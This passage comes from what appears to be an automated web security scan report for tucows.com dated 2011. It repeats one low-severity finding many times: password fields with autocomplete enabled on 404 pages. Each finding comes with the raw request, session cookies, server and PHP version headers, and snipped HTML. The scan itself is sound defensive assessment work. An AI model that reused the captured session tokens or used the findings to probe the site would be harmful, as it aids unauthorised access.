Date: Thu, 03 Feb 2011 21:26:39 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<div id="signup" style="visibility: hidden;">
               <form id="signupform" name="signupform" method="POST" action="javascript:void(null);" onsubmit="submitSignup(this);">
                   <div class='Clear bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...
<br />
                           <input type="password" name="pwc" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

14.74. http://www.tucows.com/images/newassets/javascript:void(null)  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/javascript:void(null)

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /images/newassets/javascript:void(null) HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:39 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<div id="signin" style="visibility: hidden;">
               <form id="signinform" method="POST" action="javascript:void(null);" onsubmit="submitSignin(this);">
                   <div class='bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

14.75. http://www.tucows.com/images/newassets/lostpass.html  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/lostpass.html

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /images/newassets/lostpass.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:25:42 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<div id="signin" style="visibility: hidden;">
               <form id="signinform" method="POST" action="javascript:void(null);" onsubmit="submitSignin(this);">
                   <div class='bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

14.76. http://www.tucows.com/images/newassets/lostpass.html  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/lostpass.html

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /images/newassets/lostpass.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:25:42 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<div id="signup" style="visibility: hidden;">
               <form id="signupform" name="signupform" method="POST" action="javascript:void(null);" onsubmit="submitSignup(this);">
                   <div class='Clear bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...
<br />
                           <input type="password" name="pwc" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

14.77. http://www.tucows.com/images/newassets/privacy.html  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/privacy.html

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /images/newassets/privacy.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:13 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<div id="signup" style="visibility: hidden;">
               <form id="signupform" name="signupform" method="POST" action="javascript:void(null);" onsubmit="submitSignup(this);">
                   <div class='Clear bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...
<br />
                           <input type="password" name="pwc" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

14.78. http://www.tucows.com/images/newassets/privacy.html  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/privacy.html

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /images/newassets/privacy.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:13 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<div id="signin" style="visibility: hidden;">
               <form id="signinform" method="POST" action="javascript:void(null);" onsubmit="submitSignin(this);">
                   <div class='bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

14.79. http://www.tucows.com/images/newassets/safesearchtoggle.html  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/safesearchtoggle.html

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /images/newassets/safesearchtoggle.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:25:57 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<div id="signin" style="visibility: hidden;">
               <form id="signinform" method="POST" action="javascript:void(null);" onsubmit="submitSignin(this);">
                   <div class='bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

14.80. http://www.tucows.com/images/newassets/safesearchtoggle.html  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/safesearchtoggle.html

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /images/newassets/safesearchtoggle.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:25:57 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<div id="signup" style="visibility: hidden;">
               <form id="signupform" name="signupform" method="POST" action="javascript:void(null);" onsubmit="submitSignup(this);">
                   <div class='Clear bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...
<br />
                           <input type="password" name="pwc" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

14.81. http://www.tucows.com/images/newassets/search.html  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/search.html

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /images/newassets/search.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:46 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<div id="signin" style="visibility: hidden;">
               <form id="signinform" method="POST" action="javascript:void(null);" onsubmit="submitSignin(this);">
                   <div class='bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

14.82. http://www.tucows.com/images/newassets/search.html  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/search.html

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /images/newassets/search.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:46 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<div id="signup" style="visibility: hidden;">
               <form id="signupform" name="signupform" method="POST" action="javascript:void(null);" onsubmit="submitSignup(this);">
                   <div class='Clear bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...
<br />
                           <input type="password" name="pwc" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

14.83. http://www.tucows.com/images/newassets/sitemap.html  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/sitemap.html

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /images/newassets/sitemap.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:11 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<div id="signin" style="visibility: hidden;">
               <form id="signinform" method="POST" action="javascript:void(null);" onsubmit="submitSignin(this);">
                   <div class='bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

14.84. http://www.tucows.com/images/newassets/sitemap.html  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/sitemap.html

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /images/newassets/sitemap.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:11 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<div id="signup" style="visibility: hidden;">
               <form id="signupform" name="signupform" method="POST" action="javascript:void(null);" onsubmit="submitSignup(this);">
                   <div class='Clear bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...
<br />
                           <input type="password" name="pwc" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

14.85. http://www.tucows.com/images/newassets/terms.html  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/terms.html

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /images/newassets/terms.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:22 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<div id="signup" style="visibility: hidden;">
               <form id="signupform" name="signupform" method="POST" action="javascript:void(null);" onsubmit="submitSignup(this);">
                   <div class='Clear bgBlue'>
...[SNIP]...
<br />
